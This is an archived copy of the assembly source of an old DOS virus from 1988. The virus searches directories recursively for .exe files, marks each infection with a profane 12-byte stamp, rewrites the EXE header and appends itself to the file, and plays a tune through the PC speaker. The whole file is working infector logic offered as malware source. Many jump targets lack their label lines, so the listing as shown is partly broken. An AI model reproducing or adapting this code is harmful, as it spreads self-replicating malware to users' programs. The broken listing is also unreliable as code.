💾 Archived View for spam.works › mirrors › textfiles › virus › enigma.asm captured on 2023-11-04 at 16:00:57.

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comment 	/		
		Good luck!
		Vladimir Botchev, CICT-BAS, december 1988

data_area	struc			;Define a pattern for working data
DS_save		dw	?
ES_save		dw 	?
IP_save		dw	?
CS_save		dw	?
SS_save		dw	?
filematch	db	'*.exe',00h	;Names for files to infect
matchall 	db      '*.*',00h	;needed for the matching procedure
infected	dw	00h		;A very useful flag
help_flag	dw	00h		;These two flags are needed to 
where_from_flag dw	00h		;determine if virus is free running
					;or from an infected program
					;therefore it's very important 
					;that where_from_flag value
					;is set to zero at assembly time
handle		dw	?					
ip_old		dw	?		;old instruction pointer
cs_old		dw	?		;old value of code segment
ss_old		dw	?
far_push	dw	?
save_push	dw	?
buffer1		db	'\',63 dup (?)
virus_stamp	db	'motherfucker'		;Very hard to obtain in
						;a random way

buffer2 	db	2b0h dup (?)
new_area	db	64 dup (?)
new_data	db	64 dup (?)
pointer1	dw	?
pointer2	dw	?
pointer3	dw	?
pointer4	dw	?
pointer5	dw	?
pointer6	dw	?
pointer7	dw	?
pointer8	dw	?

data_area	ends			

	org	100h			;Defined for .com file as virus must
					;be able to run on itself
start:	call	setup_data		;This is a near call therefore it's a
					;three byte instruction.It's purpose is
					;to catch correct data area address 
					;even when virus is appended to the
					;infected .exe program 
adjust	equ	offset pgm_start	;Known offset value  
pgm_start	label	word		;	

virussize	equ	2793
 work:  mov	ax,ds			;Save old DS
 	push	cs
	pop	ds			;Update to needed DS value
	mov	si,offset buffer.DS_save  ;Put old DS in a quiet place
	sub	si,adjust
	add	si,bx
	mov	[si],ax
 	mov	si,offset buffer.ES_save  ;Save it because Get DTA side effects
 	sub	si,adjust
	add 	si,bx
 	mov	ax,es
	mov	[si],ax
	push	cs			;Imperative because DI usage
	pop	es
	push	bx			;It's imperative to always keep
					;this value unchanged
	mov	ax,2f00h		;Get DTA function call
	int	21h
	mov	cx,bx			;save address found
	pop	bx
	mov	si,offset buffer.pointer1 
	sub	si,adjust
	add	si,bx
	mov	[si],cx
	add	si,2			;Locate the segment immediately above
	mov	ax,es
	mov	[si],ax				
	push	cs
	pop	es
	mov	di,offset buffer.buffer1 ;adjust for first search
	inc	di		         ;Jump over the '\'
	sub	di,adjust
	add	di,bx
	mov	dx,0000h
	push	bx
	call	search_exe
	pop	bx
	mov	si,offset buffer.where_from_flag
	sub	si,adjust
	add	si,bx
	cmp	word ptr [si],0000h
	jnz	infected_run 
	int	020H

	mov	si,offset buffer.pointer1
	sub	si,adjust
	add	si,bx
	mov	dx,[si]
	push	ds
	mov	ax,[si+2]
	mov	ds,ax
	push	bx
	mov	ax,1a00h
	int	21h
	pop	bx
	pop	ds			;Restore original DTA
	mov	si,offset buffer.ES_save
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	es,ax			;Restore ES
	;Here you can do whatever you want

	push	bx
	call	mary_proc
	pop	bx


	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	dx,[si+2]
	mov	si,offset buffer.far_push	;Restore original code
	sub	si,adjust			;segment
	add	si,bx
	mov	cx,[si]
	push	ax
	mov	ax,cs
	sub	ax,cx
	mov	di,ax				;For stack
	add	dx,ax
	pop	ax
	mov	si,offset buffer.SS_save
	sub	si,adjust			;Restore stack segment
	add	si,bx
	mov	cx,word ptr [si]
	add	cx,di
	push	es
	pop	ds
	mov	ss,cx
	push	dx
	push	ax

search_exe	PROC

	push	si
	push	dx
	call	transfer_filespec		;transfer filename in another
						;working area
	call	find_first			;try to find a first match
	jc	not_here			;first match not found
	call	try_to_infect			;if found try to infect
						;infected != 0 if success
	mov	si,offset buffer.infected
	sub	si,adjust
	add	si,bx
	test	word ptr [si],0ffffh
	jz	try_next
	jmp	quiet_exit
	call	find_next			;If infection was not succesful
						;try once more 
	jc	not_here

	call	try_to_infect			;If match found try to infect
      	mov	si,offset buffer.infected	;again
	sub	si,adjust
	add	si,bx
	test	word ptr [si],0ffffh
	jz	try_next

	jmp	quiet_exit			;quiet exit simply jumps
						;to a return instruction
	pop	dx				;If first searches are
	push	dx      			;unsuccesful try a '*.*' match
	call	search_all
	call	find_first
	jnc	attribute_test			;i.e. expect probably to
						;find a subdirectory
	pop	dx
	pop	si
	mov	si,dx				;offset of DTA
	test	byte ptr [si+015h],010h		;where attribute byte is to
						;be found.Try first with 
						;subdirectory attribute
	jne	dir_found			;subdirectory found
	call	find_next			;Since the search was initiated
						;with '*.*' if this is not a
						;directory try to found one
	jc	quiet_exit			;No sense to search more 
	test	byte ptr [si+015h],010h
	jz	more_tries			;Search to the end
	cmp	byte ptr [si+01Eh],02Eh 	;Compare with the subdirectory
						;mark '.'
	jz	more_tries			;looking for files no

	call	dta_compute			;Valid entry, now set some DTA
						;and continue to search
	push	ax
	mov	ah,01Ah				;Set DTA function call
	int	021h
	pop	ax
	push	si
      	mov	si,offset buffer.infected	
	sub	si,adjust
	add	si,bx
	test	word ptr [si],0ffffh
	pop	si
	jnz	quiet_exit

	jmp	more_tries			

search_exe	ENDP

dta_compute 	PROC

	push	di				;Save some registers
	push	si
	push	ax
	push	bx
	cld					;Up count for SI,DI pair
	mov	si,dx				;DTA address to SI
	add	si,01EH				;and add subdirectory
						;name offset
	or	al,al
	jne	store_loop			;store loop

	mov	al,05Ch				;Put in place the path name
	add	di,2				;Adjust di for new searches
	call	search_exe			;
						;a heavily recursion
	pop	bx				;some cleanup and exit 
	pop	ax
	pop	si
	pop	di

dta_compute 	ENDP

try_to_infect 	PROC				

	push	ax
	push	bx
	push	cx
	push	dx
	push	si
	push	di
	push	es
	push	bx
	mov	ax,2f00h			;Get DTA function call
	int	21h
	mov	ax,bx
	pop	bx
	mov	si,offset buffer.pointer3
	sub	si,adjust
	add	si,bx
	mov	[si],ax				;Offset saved
	add 	si,2
	mov	ax,es
	mov	[si],ax
	pop	es				;Segment located just above

	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	push	bx
	mov	ax,1a00h
	int	21h				;Set DTA function call
	pop 	bx				;It's very important to
						;save BX in all calls

	mov	di,offset buffer.new_area
	mov	si,offset buffer.buffer1
	sub	di,adjust
	sub	si,adjust
	add	di,bx
	add	si,bx
	cld					;Move previously found path-
						;name or filename to new
						;data area
	or	al,al
	jnz	move_path
	std					;adjust DI to recieve
	mov	al,'\'				;filename.
	mov	cx,0040h
	std					;Search backward
	repne   scasb
	mov	si,offset buffer.pointer3
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	si,ax
	add	di,2				

	add	si,001eh			;The beginning of the
	cld					;Now move name
	or	al,al
	jnz	move_fnm
	push	dx
	push	bx
	mov	dx,offset buffer.new_area
	sub	dx,adjust
	add	dx,bx
	mov	ax,3d02h			;Open file with handle
						;for read/write
	int	21h
	pop	bx
	pop	dx
	jnc	go_ahead			;In case file cannot be opened
	jmp	error_exit
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	[si],ax				;Save handle
	push	bx
	mov	bx,ax				;Prepare for lseek
	push	dx
	mov	cx,0000h			;Look at the end of the file
	mov	dx,0000h			;Offset of -12 from the end
						;of the file
	mov	ax,4202h			;Lseek function call
	int	21h
	mov	cx,dx
	pop	dx
	pop	bx
	jnc	compute_length
	jmp	close_error

	sub	ax,000ch
	sbb	cx,0000h			;Exact position

save_offset:					;	
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	add	si,2
	mov	[si],cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	mov	dx,ax
	mov	ax,4200h			;From beginning of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	jnc	set_buffer
	jmp	close_error
	push	bx
	push	dx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,000ch
	mov	ax,3f00h
	int	21h				;Read function call
	pop	dx
	pop	bx
	jnc	read_ok
	jmp	close_error
	mov	si,offset buffer.virus_stamp
	mov	di,offset buffer.new_data
	sub	si,adjust
	sub	di,adjust
	add	si,bx
	add 	di,bx
	mov	cx,12				;Length of strings to
	repe	cmpsb
      	mov	si,offset buffer.infected	
	sub	si,adjust
	add	si,bx
	mov	word ptr [si],0000h		
	jnz	infect_it

	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	push	bx
	mov	bx,[si]
	mov	ax,3e00h			;Close file function call
	int	21h
	pop	bx
	jmp	error_exit
      	mov	si,offset buffer.infected	
	sub	si,adjust
	add	si,bx
	mov	word ptr [si],7777h		
	mov	si,offset buffer.where_from_flag
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	sub 	si,2
	mov	[si],ax			;This code effectively moves
					;where_from_flag into help_flag
	add	si,2
	mov	[si],5a5ah		;Ready to infect
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4200h			;From beginning of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	jnc	set_new_data
	jmp	append_ok
	push	bx
	push	dx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Read formatted exe header
	mov	ax,3f00h
	int	21h				;Read function call
	pop	dx
	pop	bx
	jnc	read_header
	jmp	append_ok

	nop					;some code to modify header
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add	si,2
	add	ax,0ch
	adc	word ptr [si],0000h
	sub	si,2
	mov	[si],ax			;This code restores original
	mov	si,offset buffer.new_data
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	cmp	ax,5a4dh		;check for valid exe file
	jz	valid_exe
	jmp	append_ok
	mov	ax,[si+8]		;Load module size
	xor	dx,dx
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	push	ax
	push	dx			;Adjust new size
	push	cx
	mov	dx,virussize-896+64
	push	dx
	mov	cx,0009h
	shr	dx,cl
	add	word ptr [si+4],dx
	pop	dx
	and	dx,01ffh
	add	dx,word ptr [si+2]
	cmp	dx,512
	jl	adjust_okay
	sub	dx,512
	inc	word ptr [si+4]
	mov	word ptr [si+2],dx	
	pop	cx
	pop	dx
	pop	ax

	push	si			;This SI is very useful so save it
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	sub	[si],ax
	mov	ax,[si]
	sbb	[si+2],dx
	mov	dx,[si+2]		;the byte size of the load module

	pop	si
	push	ax
	push	dx
	mov	ax,[si+14h]
	mov	dx,[si+16h]		;Get CS:IP value
	mov	cx,[si+0eh]		;Get SS value
	push	si
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	xchg	[si],ax
	xchg	[si+2],dx
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	xchg	[si],cx
	mov	si,offset buffer.ip_old
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	[si],cx
	pop	si
	pop	dx
	pop	ax
	push	ax
	push	dx
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	mov	cx,0008h
	shl	dx,cl
	mov	cx,0004h
	shr	ax,cl			;A very obscure algorithm to make
					;a segment:offset pair
	mov	[si+14h],ax
	mov	[si+16h],dx		;Infected values

	push	si
	mov	si,offset buffer.far_push
	sub	si,adjust
	add	si,bx
	xchg	[si],dx
	mov	word ptr [si+2],dx
	pop	si
	pop	dx
	pop	ax
	add	ax,virussize		;
	adc	dx,0000h

	mov	cx,0003h	

	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 4096
	loop	mul_loop
	or	ax,ax
	jz	exact_value
	inc	dx
	mov	[si+0eh],dx		;Infected stack segment 
					;Write back infected header
	push	si
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5700h		;Get time function
	int	21h
	pop	bx
	pop	si
	jnc	correct_time
	jmp	append_ok1
	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4200h			;From beginning of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	continue_infection
	jmp	append_ok1
	push	cx
	push	dx
	push	bx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Write infected exe header
	mov	ax,4000h
	int	21h				;Write function call
	pop	bx
	pop	dx
	pop	cx
	jnc	glue_virus
	jmp	append_ok1

	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4202h			;From the end of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	write_data
	jmp	append_ok1
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	push	dx
	push	cx
	mov	dx,bx
	sub	dx,3				;The starting three byte
						;call instruction
	push	es
	push	bx
	push	dx
	push	si
	mov	ax,2f00h
	int	21h
	pop	si
	pop	dx
	push	es
	push	bx
	push	si
	mov	ax,1a00h
	int	21h
	pop	si
	mov	bx,[si]				;Load handle
	mov	cx,virussize-896+64		;Length of virus obtained
	mov	ax,4000h			;with dir
	int	21h
	lahf					;Write function call

	pop	bx
	pop	es
	push	ds
	push	es
	pop	ds
	mov	dx,bx
	push	ax
	mov	ax,1a00h
	int	21h
	pop	ax
	pop	ds
	pop	bx
	pop	es
	pop	cx
	pop	dx
	jnc	put_stamp			;Error or not file
	jmp	append_ok1			;is closed	
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5701h		;Set time function
	int	21h
	pop	bx


	mov	si,offset buffer.ip_old	;Restore previous CS:IP values
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	dx,[si+2]
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx	

	mov	si,offset buffer.save_push
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	word ptr [si-2],ax
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	mov	word ptr [si],ax
	mov	si,offset buffer.help_flag
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add 	si,2
	mov	[si],ax			;This code effectively moves
					;help_flag into where_from_flag 

	jmp	close_error			;
	mov	si,offset buffer.pointer3
	sub	si,adjust
	add	si,bx
	mov	dx,[si]			;Restore original DTA
	add	si,2
	mov	ax,[si]
	push	ds
	mov	ds,ax
	mov	ax,1a00h		;Set DTA function call
	int	21h
	pop	ds
	pop	di
	pop	si
	pop	dx
	pop	cx
	pop	bx
	pop	ax
try_to_infect	ENDP
transfer_filespec 	PROC

	push	si
	mov	si,offset buffer.filematch 	;Transfer name to the working
	sub	si,adjust
	add	si,bx
	call	byte_move
	pop	si

transfer_filespec 	ENDP

search_all 	PROC

	push	si
	mov	si,offset buffer.matchall	;This is the '*.*' filename
	sub	si,adjust
	add	si,bx
	call	byte_move
	pop	si
search_all 	ENDP
byte_move	PROC

	push	ax
	push	di


	or	al,al				;The string to move is ASCIIZ
	jne	move_loop
	pop	di
	pop	ax
byte_move	ENDP
find_first	PROC

	push	cx
	push	bx
	cmp	dx,0000h
	jnbe	over_set
	mov	dx,offset buffer.buffer2		;Set Data Transfer Area
	sub	dx,adjust				;or Disk Transfer area
	add	dx,bx					;
	add	dx,02Bh
	mov	cx,00010h				;Attribute byte for 
							;directory search
	mov	ah,01ah
	int	021h					;Set DTA function call
	pop	bx
	push	bx
	push	dx
	mov	dx,offset buffer.buffer1
	sub	dx,adjust
	add	dx,bx
	mov	ah,04eh				;find first
						;function call
	int	021h
	pop	dx
	pop	bx
	pop	cx
find_first	ENDP
find_next 	PROC

	push	cx
	push	bx
	push	dx
	mov	dx,offset buffer.buffer1
	sub	dx,adjust
	add	dx,bx
	mov	cx,00010h
	mov	ah,04fh				;Find next function call
	int	021h
	pop	dx
	pop	bx
	pop	cx

find_next 	ENDP

delay	PROC

	push	ax
	push	bx
	push	cx
	push	dx
	mov	ah,2ch			;Read current time
	int	21h
	mov	ah,ch
	add	al,cl
	add	bh,dh
	add	bl,dl
	cmp	bl,100
	jb	secs
	sub	bl,100
	inc	bh
secs:   cmp	bh,60
	jb	mins
	sub	bh,60
	inc	al
mins:	cmp	al,60
	jb	hours
	sub	al,60
	inc	ah
hours:	cmp	ah,24
	jne	tcheck
	sub	ah,ah
tcheck: push	ax
	mov	ah,2ch
	int	21h
	pop	ax
	cmp	cx,ax
	ja	tdquit
	jb	tcheck
	cmp	dx,bx
	jb	tcheck
tdquit: pop	dx
	pop	cx
	pop	bx
	pop	ax
delay	ENDP						

sound	PROC

	push	ax
	push	cx
	push	dx
	push	di
	mov	al,0b6h
	out	43h,al
	mov	dx,14h
	mov	ax,533h*896
	div	di
	out	42h,al
	mov	al,ah
	out	42h,al
	in	al,61h
	mov	ah,al
	or	al,3
	out	61h,al
	mov	al,cl
	call	delay
	mov	al,ah
	out	61h,al
	pop	di
	pop	dx
	pop	cx
	pop	ax
sound	ENDP

music_play	PROC

	push	bx
	push	cx
	push	di
	push	si
	push	bp


	mov	di,[si]
	cmp	di,0ffffh
	je	end_play
	mov	bl,ds:[bp]
	sub	cl,cl
	sub	bh,bh
	call	sound
	add	si,2
	inc	bp
	jnz	freq
	pop	bp
	pop	si
	pop	di
	pop	cx
	pop	bx
music_play	ENDP

mary_proc	PROC

	push	bx
	push	bp
	mov	si,offset mary_freq
	mov	bp,offset mary_time
	sub	si,adjust
	sub	bp,adjust
	add	si,bx
	add	bp,bx
	call	music_play
	pop	bp
	pop	bx

mary_proc	ENDP

mary_freq	dw	262,262,293,329,262,329,293,196
		dw	262,262,293,329,262,262
		dw	262,262,293,329,349,329,293,262
		dw	246,196,220,246,262,262
		dw	220,246,220,174,220,246,262,220
		dw	196,220,196,174,164,174,196
		dw	220,246,220,174,220,246,262,220
		dw	196,262,246,293,262,262,0ffffh

mary_time	db	8 dup(25)
		db	4 dup(25), 50, 50
		db	8 dup(25)
		db	4 dup(25), 50, 50
		db	26, 25, 26, 5 dup(25)
		db	26, 25, 26, 3 dup(25), 30
		db	26, 25, 26, 4 dup(25), 30
		db	4 dup(25), 50, 50


	pop	bx			;This will catch instruction pointer 
	push	bx	
	sti				;value and after that restore stack
	ret				;pointer value		

buffer	data_area	<>		;Reseve data_area space 	

	END 	start